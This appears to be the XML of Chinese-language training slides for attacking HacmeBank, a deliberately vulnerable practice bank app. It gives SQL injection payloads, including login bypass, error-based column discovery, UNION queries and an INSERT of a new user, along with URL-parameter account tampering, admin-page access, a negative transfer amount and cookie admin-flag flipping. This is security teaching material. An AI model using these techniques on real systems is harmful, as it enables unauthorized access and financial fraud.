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22"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="143" d="100"/>
          <a:sy n="143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6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8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7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8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69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20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25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10/7/17 2:20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7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mebank.com/HacmeBank_v2_Website/aspx/Login.aspx?function=Welco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mebank.com/HacmeBank_v2_Website/aspx/Login.aspx?function=Welco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mebank.com/HacmeBank_v2_Website/aspx/Main.aspx?function=TransactionDetails&amp;account_no=520432042204000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mebank.com/HacmeBank_v2_Website/aspx/main.aspx?function=admin\Sql_Quer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mebank.com/HacmeBank_v2_Website/aspx/main.aspx?function=AccountTransf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场景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HacMe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Bank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2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注入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr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登录注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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 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hacmebank.com/HacmeBank_v2_Website/aspx/Login.aspx?function=Welcome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用户名注入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答案：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入语句：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t> ' OR 1=1 --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注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr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登录注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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 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hacmebank.com/HacmeBank_v2_Website/aspx/Login.aspx?function=Welcome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用户名注入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通过错误语句查出用户名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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2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注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>答案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查找表明</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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' </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>having 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>'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fsb_users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>.user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>查找列</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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'UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SELECT * FROM FSB_USERS WHERE USER_ID = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>'1' </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>GROUP BY USER_ID HAVING 1 = 1;--</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Column '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>FSB_USERS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Column '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>FSB_USERS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>login_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Column '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>FSB_USERS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Column '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>FSB_USERS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>creation_date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>查看列格式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>' UNION SELECT SUM(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>) FROM FSB_USERS HAVING 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>The sum or average aggregate operation cannot take a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 data type as an argument</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>插入用户</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>'; INSERT INTO FSB_USERS (USER_NAME, LOGIN_ID, PASSWORD, CREATION_DATE) VALUES('HAX0R12', 'HACKME12', 'EASY32', GETDATE());--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122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水平权限</a:t>
            </a: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lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> 查看其他人账户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登录（用户名／口令：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>jv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/jv789)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 :My Account -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0"/>
              <a:t>View Transactions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URL : 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err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>hacmebank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/HacmeBank_v2_Website/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>aspx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Main.aspx?function</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>TransactionDetails&amp;account_no</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=5204320422040001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把</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>account_no</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>换成其它（非自己的）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Jane </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Chris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的账户为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5204320422040005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>520432042204000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is-IS" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>520432042204000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is-IS" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>520432042204000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>8</a:t>
            </a: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6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垂直权限</a:t>
            </a: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lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> 到管理员界面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登录（用户名／口令：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>jv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/jv789)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 :</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>登录后主页面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URL : http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>hacmebank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/HacmeBank_v2_Website/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>aspx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main.aspx?function</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=Welcome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换成其它页面（管理员页面）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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hacmebank.com/HacmeBank_v2_Website/aspx/main.aspx?function=admin\Sql_Query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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>hacmebank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/HacmeBank_v2_Website/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>aspx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main.aspx?function</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=admin\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Manage_Users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8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逻辑漏洞（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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> 转账数额为负数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登录（用户名／口令：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>jv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/jv789)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 :</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>转账界面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> Transfer Funds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URL : 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hacmebank.com/HacmeBank_v2_Website/aspx/main.aspx?function=AccountTransfer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外部转账：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>账户：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>520432042204000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>金额：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-100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垂直权限</a:t>
            </a:r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lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> 更改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>cookie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登录（用户名／口令：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>jv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/jv789)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 :</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>登录时返回的</a:t>
            </a:r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更改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Cookie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Admin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正常用户为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>false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把返回包里的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>setCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中的该值设置成</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>true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93303"/>
            <a:ext cx="8915400" cy="303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30" y="3553446"/>
            <a:ext cx="889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a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ooann" id="{B3505433-59A5-6646-97E7-6033771F0962}" vid="{C4BE278A-D352-A14C-8A72-5E8A332441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gooann</Template>
  <TotalTime>1785</TotalTime>
  <Words>423</Words>
  <Application>Microsoft Macintosh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Mangal</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>楷体</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>gooann</vt:lpstr>
      <vt:lpstr>场景1 HacMe Bank</vt:lpstr>
      <vt:lpstr>SQL注入 (1)</vt:lpstr>
      <vt:lpstr>SQL注入 (2)</vt:lpstr>
      <vt:lpstr>SQL注入 (2)答案</vt:lpstr>
      <vt:lpstr>水平权限(1) – 查看其他人账户</vt:lpstr>
      <vt:lpstr>垂直权限(1) – 到管理员界面</vt:lpstr>
      <vt:lpstr>逻辑漏洞（1） – 转账数额为负数</vt:lpstr>
      <vt:lpstr>垂直权限(2) – 更改cookie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场景1 HacMe Bank</dc:title>
  <dc:creator>金炫臻</dc:creator>
  <cp:lastModifiedBy>金炫臻</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-07T06:19:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-08T12:05:30Z</dcterms:modified>
</cp:coreProperties>
</file>